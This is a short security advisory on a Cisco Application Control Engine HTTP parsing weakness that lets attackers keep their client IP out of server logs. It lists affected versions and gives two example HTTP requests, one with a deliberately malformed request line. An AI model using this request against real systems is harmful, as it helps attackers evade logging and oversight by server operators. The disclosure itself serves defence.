Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness

Bugtraq ID:	40002
Class:	Design Error
CVE:
Remote:	Yes
Local:	No
Published:	May 07 2010 12:00AM
Updated:	May 07 2010 12:00AM
Credit:	Alexis Tremblay
Vulnerable:	Cisco ACE Application Control Engine Module 3.0(0)A2(2.3) Cisco ACE Application Control Engine Module 3.0(0)A2(2.2.28) Cisco ACE Appliance 0 Cisco ACE 4710 Appliance A3(2.1) Cisco ACE 4710 Appliance A2(3.0) Cisco ACE 4710 Appliance A1(8a) Cisco ACE 4710 Appliance A1(8.0) Cisco ACE 4710 Appliance 0
Not Vulnerable:

Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness

Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.

Attackers can exploit this issue to avoid having client IP addresses logged by servers.

Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness

The following example requests are available:

GET / HTTP / 1 . 1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

GET / HTTP/1.1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness

References:

• ACE Application Control Engine Module Homepage (Cisco)
  
• Vulnerability with Cisco ACE. A2 3.0 (probably all version) (Alexis Tremblay )